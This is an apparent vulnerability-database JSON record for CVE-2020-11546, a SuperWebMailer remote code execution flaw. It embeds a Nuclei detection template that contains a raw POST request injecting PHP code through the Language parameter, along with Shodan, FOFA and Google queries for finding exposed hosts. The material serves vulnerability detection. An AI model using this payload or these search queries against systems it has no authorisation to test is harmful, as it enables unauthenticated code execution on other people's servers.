{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-11546/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-11546/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-11546/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-11546/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-11546/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-11546"},"sightings":{"href":"/api/v1/sightings/cve-2020-11546"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.32841,"kev":false,"percentile":0.9828},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-11546.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2020-11546\n\ninfo:\n  name: SuperWebmailer 7.21.0.01526 - Remote Code Execution\n  author: Official_BlackHat13\n  severity: critical\n  description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Upgrade to the latest version of SuperWebmailer to mitigate this vulnerability.\n  reference:\n    - https://github.com/Official-BlackHat13/CVE-2020-11546/\n    - https://blog.to.com/advisory-superwebmailer-cve-2020-11546/\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-11546\n    - https://github.com/ARPSyndicate/kenzer-templates\n    - https://github.com/HimmelAward/Goby_POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-11546\n    cwe-id: CWE-94\n    epss-score: 0.32841\n    epss-percentile: 0.9828\n    cpe: cpe:2.3:a:superwebmailer:superwebmailer:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: superwebmailer\n    product: superwebmailer\n    shodan-query:\n      - title:\"SuperWebMailer\"\n      - http.title:\"superwebmailer\"\n    fofa-query: title=\"superwebmailer\"\n    google-query: intitle:\"superwebmailer\"\n  tags: cve,cve2020,rce,superwebmailer,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /mailingupgrade.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        step=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - ajax_ccea.php\n          - ajax_getemailingactions.php\n          - ajax_getemailtemplates.php\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100955a0ece0ac1687c7ce6be2475994737a01f0227b8b0d58a672f1e64fdda56c40220119d083826ccfa8ec5b222cd900686cb4f85d6757c02898d4b9e1d6f50d6024c:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-11546"}